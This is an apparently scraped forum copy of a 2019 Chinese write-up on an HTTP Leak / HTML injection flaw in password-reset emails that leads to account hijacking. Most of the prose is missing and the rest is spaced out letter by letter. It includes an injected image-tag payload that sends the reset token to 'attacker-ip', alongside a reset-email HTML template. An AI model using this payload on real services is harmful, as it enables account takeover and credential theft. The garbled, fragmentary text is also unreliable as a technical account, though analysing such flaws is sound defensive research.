[14036] 2019-04-27_HTTPLeak实现任意账户劫持的漏洞解析

文档创建者:s7ckTeam
浏览次数:35
最后更新:2025-01-18
2019-04-27_HTTPLeak实现任意账户劫持的漏洞解析 H T T P   L e a k c l o u d s   F r e e B u f   2 0 1 9 - 0 4 - 2 7 H T M L H T M L i n j e c t i o n H T T P   L e a k T o k e n a p p . c o m H T M L P O S T [ R E S E T   L I N K ] H T M L e m a i l B o d y 使 西
c l i c k P O S T [ R E S E T - L I N K ] H T M L e m a i l B o d y H T M L ?   H T T P   L e a k T o k e n H T T P   L e a k W e b H T M L H T M L H T T P C u r e 5 3 H T T P   L e a k s G i t h u b   - H t t p L e a k s H T T P H T T P   L e a k C S P @ f i l e d e s c r i p t o r C S P   2 0 1 5 @ i n t i d c H T M L   i n j e c t i o n   c a n   l e a d   t o   d a t a   t h e f t H T T P H T M L H T T P   L e a k W e b 访 H T M L H T T P H T T P   L e a k P a y l o a d H T M L E m a i l   T e m p l a t e s - - - S u b j e c t :   R e t r i e v e   y o u r   p a s s w o r d   o n   { {   s e t t i n g s . b u s i n e s s A d d r e s s . c o m p a n y   } } . - - - < ! D O C T Y P E   h t m l >
H T M L [ R E S E - T L I N K ] P a y l o a d < i m g   s r c = h t t p : / / a t t a c k e r - i p / ? i d = < i m g   s r c = h t t p : / / a t t a c k e r - i p / ? i d = { {   R E S E T - L I N K   } }   h t t p : / / a t t a c k e r - i p / ? i d =   h t t p : / / a t t a c k e r - i p / t o k e n h t t p : / / a t t a c k e r - i p / < i m g   s r c = h t t p : / / a t t a c k e r - i p / ? i d =   t o k e n h t t p : / / a t t a c k e r - i p / < h t m l > < h e a d > < / h e a d > < b o d y   s t y l e = " f o n t   f a m i l y :   A r i a l ;   f o n t - s i z e : 1 2 p x ; l i n e - h e i g h t : 3 2 p x ; ; " > < d i v >         < p >                 Y o u   h a v e   r e q u e s t e d   a   p a s s w o r d   r e s e t ,   p l e a s e   f o l l o w   t h e   l i n k   b e l o w   t o   r e s e t   y o u r   p a s s w o r d .         < / p >         < p >                 P l e a s e   i g n o r e   t h i s   e m a i l   i f   y o u   d i d   n o t   r e q u e s t   a   p a s s w o r d   c h a n g e .         < / p >         < p >                 < a   h r e f = " { {   R E S E T - L I N K   } } " >                         F o l l o w   t h i s   l i n k   t o   r e s e t   y o u r   p a s s w o r d .                 < / a >         < / p > < / d i v > < / b o d y > < / h t m l >
t o k e n G m a i l   Y a h o o H T M L + H T T P   L e a k H T M L 2 0 1 9 . 1 . 8   2 0 1 9 . 1 . 1 0   2 0 1 9 . 1 . 1 0   * m e d i u m c l o u d s F r e e B u f . C O M

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则